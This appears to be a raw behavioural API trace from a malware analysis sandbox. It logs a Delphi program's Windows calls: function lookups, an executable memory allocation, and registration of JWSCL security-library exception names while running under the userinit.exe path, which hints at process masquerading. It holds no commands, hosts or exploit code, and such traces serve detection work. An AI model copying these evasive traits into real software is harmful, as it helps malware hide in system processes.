[0160.504] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x14f573, fWinIni=0x0 | out: pvParam=0x14f573) returned 1
[0160.504] CreateFontIndirectA (lplf=0x14f573) returned 0x2c0a088b
[0160.504] GetObjectA (in: h=0x2c0a088b, c=60, pv=0x14f364 | out: pv=0x14f364) returned 60
[0160.505] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x14f41f, fWinIni=0x0 | out: pvParam=0x14f41f) returned 1
[0160.505] CreateFontIndirectA (lplf=0x14f4fb) returned 0x9c0a084e
[0160.505] GetObjectA (in: h=0x9c0a084e, c=60, pv=0x14f364 | out: pv=0x14f364) returned 60
[0160.505] CreateFontIndirectA (lplf=0x14f4bf) returned 0x840a0890
[0160.505] GetObjectA (in: h=0x840a0890, c=60, pv=0x14f364 | out: pv=0x14f364) returned 60
[0160.505] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0160.505] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f4d3, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.505] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x14f4d3 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0160.505] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x220000
[0160.506] GetKeyboardLayoutList (in: nBuff=64, lpList=0x14f454 | out: lpList=0x14f454) returned 1
[0160.507] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0160.507] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0160.507] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0160.508] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0160.509] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0160.509] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0160.509] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0160.509] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0160.509] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0160.509] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0160.509] LoadStringA (in: hInstance=0x28f0000, uID=0xff59, lpBuffer=0x14f1b4, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0160.509] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0160.509] LoadStringA (in: hInstance=0x28f0000, uID=0xff5a, lpBuffer=0x14f1b4, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0160.509] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0160.509] LoadStringA (in: hInstance=0x28f0000, uID=0xff5b, lpBuffer=0x14f1b4, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0160.509] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0160.509] LoadStringA (in: hInstance=0x28f0000, uID=0xff5c, lpBuffer=0x14f1b4, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0160.510] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0160.510] SetErrorMode (uMode=0x8000) returned 0x1
[0160.510] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d770000
[0160.512] SetErrorMode (uMode=0x1) returned 0x8000
[0160.512] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePropertyFrame") returned 0x6d7720ea
[0160.512] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreateFontIndirect") returned 0x6d7720b7
[0160.512] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePictureIndirect") returned 0x6d7720c8
[0160.512] GetProcAddress (hModule=0x6d770000, lpProcName="OleLoadPicture") returned 0x6d7720d9
[0160.512] SysReAllocStringLen (in: pbstr=0x29dfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x29dfa98*="EJwsclUnsupportedException") returned 1
[0160.512] SysReAllocStringLen (in: pbstr=0x29dfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x29dfa80*="EJwsclPIDException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29dfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x29dfa68*="EJwsclJwShellExecuteException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29dfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x29dfa50*="EJwsclShellExecuteException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29dfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x29dfa38*="EJwsclElevationException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29dfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x29dfa20*="EJwsclAbortException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29dfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x29dfa08*="EJwsclSuRunErrorException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x29df9f0*="EJwsclElevateProcessException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x29df9d8*="EJwsclCertApiException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x29df9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x29df9a8*="EJwsclInvalidStartupInfo") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x29df990*="EJwsclFirewallNoExceptionsException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x29df978*="EJwsclFirewallInactiveException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x29df960*="EJwsclFirewallDelRuleException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x29df948*="EJwsclAddUdpPortToFirewallException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x29df930*="EJwsclAddTcpPortToFirewallException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x29df918*="EJwsclFirewallAddRuleException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29df900*="EJwsclSetRemoteAdminAdressException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29df8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29df8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29df8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29df8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29df888*="EJwsclGetIncomingPingAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29df870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29df858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x29df840*="EJwsclGetFWStateException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x29df828*="EJwsclSetFWStateException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x29df810*="EJwsclFirewallProfileInitException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x29df7f8*="EJwsclFirewallInitException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x29df7e0*="EJwsclGenericFirewallException") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x29df7c8*="EJwsclEnumerateProcessFailed") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x29df7b0*="EJwsclInvalidRegistryPath") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x29df798*="EJwsclEndOfStream") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x29df780*="EJwsclClassTypeMismatch") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x29df768*="EJwsclInvalidHandle") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x29df750*="EJwsclInvalidIndex") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x29df738*="EJwsclInvalidSession") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x29df720*="EJwsclMissingEvent") returned 1
[0160.513] SysReAllocStringLen (in: pbstr=0x29df708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x29df708*="EJwsclInvalidPointerType") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x29df6f0*="EJwsclCreateProcessFailed") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x29df6d8*="EJwsclNilPointer") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x29df6c0*="EJwsclUnimplemented") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x29df6a8*="EJwsclInitWellKnownException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x29df690*="EJwsclKeyApiException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x29df678*="EJwsclKeyException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x29df660*="EJwsclHashApiException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x29df648*="EJwsclHashException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x29df630*="EJwsclCSPApiException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x29df618*="EJwsclCSPException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x29df600*="EJwsclTerminalSessionException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x29df5e8*="EJwsclTerminalServiceNecessary") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x29df5d0*="EJwsclTerminalServiceException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x29df5b8*="EJwsclTerminalServerConnectException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x29df5a0*="EJwsclTerminalServerException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x29df588*="EJwsclCryptUnsupportedException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x29df570*="EJwsclCryptApiException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x29df558*="EJwsclCryptException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x29df540*="EJwsclOSError") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x29df528*="EJwsclResourceInitFailed") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x29df510*="EJwsclResourceUnequalCount") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x29df4f8*="EJwsclResourceNotFound") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x29df4e0*="EJwsclResourceException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x29df4c8*="EJwsclFailedAddACE") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x29df4b0*="EJwsclUnsupportedACE") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x29df498*="EJwsclOpenWindowStationException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x29df480*="EJwsclWindowStationException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x29df468*="EJwsclCloseDesktopException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x29df450*="EJwsclCreateDesktopException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x29df438*="EJwsclOpenDesktopException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x29df420*="EJwsclDesktopException") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x29df408*="EJwsclSACLAccessDenied") returned 1
[0160.514] SysReAllocStringLen (in: pbstr=0x29df3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x29df3f0*="EJwsclAccessDenied") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x29df3d8*="EJwsclLSAException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x29df3c0*="ESetOwnerException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x29df3a8*="ESetSecurityException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x29df390*="EJwsclInvalidParentDescriptor") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x29df378*="EJwsclInvalidKeyPath") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x29df360*="EJwsclInvalidGenericAccessMask") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x29df348*="EJwsclAdaptSecurityInfoException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x29df330*="EJwsclThreadException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x29df318*="EJwsclInvalidObjectException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x29df300*="EJwsclSecurityObjectException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x29df2e8*="EJwsclHashMismatch") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x29df2d0*="EJwsclStreamHashException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x29df2b8*="EJwsclStreamInvalidMagicException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x29df2a0*="EJwsclStreamSizeException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x29df288*="EJwsclStreamException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x29df270*="EJwsclNoSuchLogonSession") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x29df258*="EJwsclInvalidFlagsException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x29df240*="EJwsclProcessNotFound") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x29df228*="EJwsclInvalidParameterException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x29df210*="EJwsclInvalidPathException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x29df1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x29df1e0*="EJwsclInvalidRevision") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x29df1c8*="EJwsclInvalidAceMismatch") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x29df1b0*="EJwsclRevisionMismatchException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x29df198*="EJwsclInvalidACEException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x29df180*="EJwsclReadOnlyPropertyException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x29df168*="EJwsclDuplicateListEntryException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x29df150*="EJwsclIndexOutOfBoundsException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x29df138*="EJwsclInvalidSidAuthorityValue") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x29df120*="EJwsclInvalidKnownSIDException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x29df108*="EJwsclInvalidComputer") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x29df0f0*="EJwsclInvalidGroupSIDException") returned 1
[0160.515] SysReAllocStringLen (in: pbstr=0x29df0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x29df0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x29df0c0*="EJwsclInvalidSIDException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x29df0a8*="EJwsclInvalidSecurityListException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x29df090*="EJwsclInvalidMandatoryLevelException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x29df078*="EJwsclEmptyACLException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x29df060*="EJwsclNILParameterException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x29df048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x29df030*="EJwsclInvalidObjectArrayException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x29df018*="EJwsclProcessIdNotAvailable") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29df000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x29df000*="EJwsclWinCallFailedException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29defe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x29defe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29defd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x29defd0*="EJwsclNotImplementedException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29defb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x29defb8*="EJwsclAccessTypeException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29defa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x29defa0*="EJwsclAdjustPrivilegeException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x29def88*="EJwsclPrivilegeCheckException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x29def70*="EJwsclPrivilegeNotFoundException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x29def58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x29def40*="EJwsclPrivilegeException") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x29def28*="EJwsclNotEnoughMemory") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29def10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x29def10*="EJwsclInvalidTokenHandle") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29deef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x29deef8*="EJwsclNoThreadTokenAvailable") returned 1
[0160.516] SysReAllocStringLen (in: pbstr=0x29deee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x29deee0*="EJwsclDuplicateTokenException") returned 1
